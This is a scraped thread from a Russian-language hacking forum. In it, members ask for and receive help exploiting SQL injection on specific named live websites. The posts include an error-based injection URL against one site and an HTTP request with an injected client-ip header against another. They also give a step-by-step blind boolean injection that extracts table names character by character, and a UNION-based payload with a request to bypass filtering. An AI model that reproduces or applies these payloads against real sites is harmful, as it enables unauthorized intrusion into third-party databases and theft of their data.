Ваши вопросы по уязвимостям.

Discussion in 'Уязвимости' started by darky, 4 Aug 2007.

Thread Status:
Not open for further replies.
  1. alerondel

    alerondel Member

    Joined:
    20 Apr 2011
    Messages:
    165
    Likes Received:
    9
    Reputations:
    6
    Ну в принципе я об этом тоже думал,логин и пасс от мускла у меня есть,только не расшифровывается)
    Думал есть какие нить варианты как в таблице бд поменять значение.
     
  2. 0x002

    0x002 New Member

    Joined:
    30 May 2011
    Messages:
    3
    Likes Received:
    0
    Reputations:
    0
    Помогите уважаемые гуру.
    и так вот сайтик:
    http://rswow.ru/page.php?p[]=rules
    Вылазит такая штука
    Подскажите как то заюзать данную штуку.

    Заранее спасибо.
     
  3. Konqi

    Konqi Green member

    Joined:
    24 Jun 2009
    Messages:
    2,251
    Likes Received:
    1,149
    Reputations:
    886
    mysql_real_escape_string() принимает параметр типа стринг, о чем и говорит имя фунцкии, а ты передаешь массив, вот и ругается..
     
    _________________________
    1 person likes this.
  4. FlaktW

    FlaktW Elder - Старейшина

    Joined:
    19 Aug 2009
    Messages:
    500
    Likes Received:
    33
    Reputations:
    12
    Например, так:

    http://wow.war-top.ru/index.php?do=sitedetails&id=74'+and+(select+1+from+(select+count(0),concat((select+version()),floor(rand(0)*2))+from+(select+1+union+select+2+union+select+3)x+group+by+2+limit+1)a)+--+
     
    #16884 FlaktW, 31 May 2011
    Last edited: 31 May 2011
  5. 0x002

    0x002 New Member

    Joined:
    30 May 2011
    Messages:
    3
    Likes Received:
    0
    Reputations:
    0
    Я понял что тип стринг
     
  6. Konqi

    Konqi Green member

    Joined:
    24 Jun 2009
    Messages:
    2,251
    Likes Received:
    1,149
    Reputations:
    886
    и что?

    ты же не будешь проверить на SQL injection через подставку массива вместо стринга

    тебе выше показали запрос
     
    _________________________
    #16886 Konqi, 31 May 2011
    Last edited: 1 Jun 2011
  7. krypt3r

    krypt3r Elder - Старейшина

    Joined:
    27 Apr 2007
    Messages:
    1,507
    Likes Received:
    389
    Reputations:
    101
    Раскрытие пути, не более того
     
  8. 0x002

    0x002 New Member

    Joined:
    30 May 2011
    Messages:
    3
    Likes Received:
    0
    Reputations:
    0
    Прошу помощи
    вот http://wow.bridge.net.ua/index.php?n=server&sub=arena&realm=-1
     
  9. Expl0ited

    Expl0ited Members of Antichat

    Joined:
    16 Jul 2010
    Messages:
    1,035
    Likes Received:
    534
    Reputations:
    935
    Где ты там увидел уязвимость?
     
    _________________________
  10. shell_c0de

    shell_c0de Hack All World

    Joined:
    7 Jul 2009
    Messages:
    1,185
    Likes Received:
    618
    Reputations:
    690
    0x002 читай маны по скуль инъекциям =\
    а то всю жизнь тебе кто то будет раскручивать недоскули =\
     
    _________________________
  11. Nek1t

    Nek1t Elder - Старейшина

    Joined:
    7 Mar 2008
    Messages:
    181
    Likes Received:
    16
    Reputations:
    1
    Что-нибудь было придумано для решения SQL-инжекций в таких запросах?

    UNION SELECT использовать соответсвенно не дает (Incorrect usage of UNION and ORDER BY).
     
  12. попугай

    попугай Elder - Старейшина

    Joined:
    15 Jan 2008
    Messages:
    1,520
    Likes Received:
    401
    Reputations:
    196
    http://forum.antichat.ru/showthread.php?t=56446
     
    1 person likes this.
  13. Nek1t

    Nek1t Elder - Старейшина

    Joined:
    7 Mar 2008
    Messages:
    181
    Likes Received:
    16
    Reputations:
    1
    http://forum.antichat.ru/showpost.php?p=535989&postcount=4

    >24.12.2007, 20:40

    Вот я и спрашиваю, а изменилось ли что-нибудь?
     
  14. Faaax

    Faaax Banned

    Joined:
    30 Aug 2010
    Messages:
    329
    Likes Received:
    46
    Reputations:
    11
    вот ссылка
    в header вписывая client-ip: 1' выходит скуля
    Но при раскручивании ничего не выявляет и не показывает!
    Помогите плз!
     
  15. M_script

    M_script Members of Antichat

    Joined:
    4 Nov 2004
    Messages:
    2,581
    Likes Received:
    1,317
    Reputations:
    1,557
    У меня ничего не выходит. Напиши HTTP-запрос и ответ, в котором ты нашел уязвимость.

    Раскрытие пути - http://ttic.ru/modules/counter/mod.php
     
  16. Faaax

    Faaax Banned

    Joined:
    30 Aug 2010
    Messages:
    329
    Likes Received:
    46
    Reputations:
    11
    Code:
    Host: ttic.ru
    User-Agent: Mozilla/5.0 (Windows NT 5.1; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
    Accept-Language: ru-ru,ru;q=0.8,en-us;q=0.5,en;q=0.3
    Accept-Encoding: gzip, deflate
    Accept-Charset: windows-1251,utf-8;q=0.7,*;q=0.7
    Keep-Alive: 115
    DNT: 1
    Cookie: PHPSESSID=b6304a7231ca8359ec09f27330a48932
    Connection: keep-alive
    Cache-Control: max-age=0
    client-ip: 1'
    через дополнение mozilla live http replay
     
  17. M_script

    M_script Members of Antichat

    Joined:
    4 Nov 2004
    Messages:
    2,581
    Likes Received:
    1,317
    Reputations:
    1,557
    Очень интересная инъекция. Один из вариантов решения:

    client-ip: -1' union select 1,2,3 from information_schema.tables where '1'='1 - true ("You have been banned")
    client-ip: -1' union select 1,2,3 from information_schema.tables where '1'='2 - false (страница без изменений)
     
  18. Faaax

    Faaax Banned

    Joined:
    30 Aug 2010
    Messages:
    329
    Likes Received:
    46
    Reputations:
    11
    вот и я о том же,этот запрос я тоже пробовал,что меня и огорчило!
     
  19. M_script

    M_script Members of Antichat

    Joined:
    4 Nov 2004
    Messages:
    2,581
    Likes Received:
    1,317
    Reputations:
    1,557
    Тут нечему огорчаться. Пиши скрипт и выводи все, что хочешь =)

    client-ip: -1' union select 1,2,3 from information_schema.tables where ascii(mid((select group_concat(table_name) from information_schema.tables where table_name like '%user%'),1,1))>128 and '1'='1 нет
    client-ip: -1' union select 1,2,3 from information_schema.tables where ascii(mid((select group_concat(table_name) from information_schema.tables where table_name like '%user%'),1,1))>64 and '1'='1 да
    client-ip: -1' union select 1,2,3 from information_schema.tables where ascii(mid((select group_concat(table_name) from information_schema.tables where table_name like '%user%'),1,1))>96 and '1'='1 нет
    client-ip: -1' union select 1,2,3 from information_schema.tables where ascii(mid((select group_concat(table_name) from information_schema.tables where table_name like '%user%'),1,1))>80 and '1'='1 да
    client-ip: -1' union select 1,2,3 from information_schema.tables where ascii(mid((select group_concat(table_name) from information_schema.tables where table_name like '%user%'),1,1))>88 and '1'='1 нет
    client-ip: -1' union select 1,2,3 from information_schema.tables where ascii(mid((select group_concat(table_name) from information_schema.tables where table_name like '%user%'),1,1))>84 and '1'='1 да
    client-ip: -1' union select 1,2,3 from information_schema.tables where ascii(mid((select group_concat(table_name) from information_schema.tables where table_name like '%user%'),1,1))>86 and '1'='1 нет
    client-ip: -1' union select 1,2,3 from information_schema.tables where ascii(mid((select group_concat(table_name) from information_schema.tables where table_name like '%user%'),1,1))>85 and '1'='1 нет

    Код первого символа - 85
     
  20. Faaax

    Faaax Banned

    Joined:
    30 Aug 2010
    Messages:
    329
    Likes Received:
    46
    Reputations:
    11
    M_cript
    спасибо за помощь
    есть ещё вопросик
    есть скуля,но в ней фильтруется и and и union
    Code:
    http://www.shoptop.ru/sitemap.html?lim1=8250%27%20&&%201=2%20UNION%20SELECT%201,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56%20#
    как обойти фильтрацию union select?
     
    #16900 Faaax, 3 Jun 2011
    Last edited: 3 Jun 2011
    1 person likes this.
Thread Status:
Not open for further replies.